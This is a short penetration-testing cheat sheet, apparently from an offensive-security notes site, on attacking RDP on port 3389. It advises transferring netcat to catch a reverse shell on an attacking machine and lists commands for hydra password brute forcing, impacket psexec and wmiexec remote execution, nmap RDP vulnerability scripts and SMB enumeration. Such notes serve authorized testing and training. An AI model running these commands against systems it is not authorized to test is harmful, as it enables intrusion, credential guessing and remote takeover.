3389 - RDP

If you get RDP, first transfer nc.exe (windows) or netcat (Linux) to get the shell back on our attacking machine.

Comes in Handy commands:

  1. Xfreerdp: xfreerdp /v:<IP> /u:<USER> /d:<DOMAIN> /p:<PASS> +clipboard /dynamic-resolution /drive:/opt,share

  2. rdesktop -u <username> <IP>

  3. rdesktop -d <domain> -u <username> -p <pass> <IP>

  4. psexec: impacket-psexec <user>:<pass>@<IP>

  5. smbclient: smbclient \\\\<IP>\\ -U <user>

  6. Nmap: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

  7. Bruteforce: hydra -L <users.txt> -p <pass.txt> <IP> rdp

  8. smbmap: smbmap -d <domain> -u <user> -p <pass> -H <IP>

  9. wmiexec: impacket-wmiexec <domain>/<user>:<pass>@<IP>

Previous25 - SMTPNext135/593 - RPC

Last updated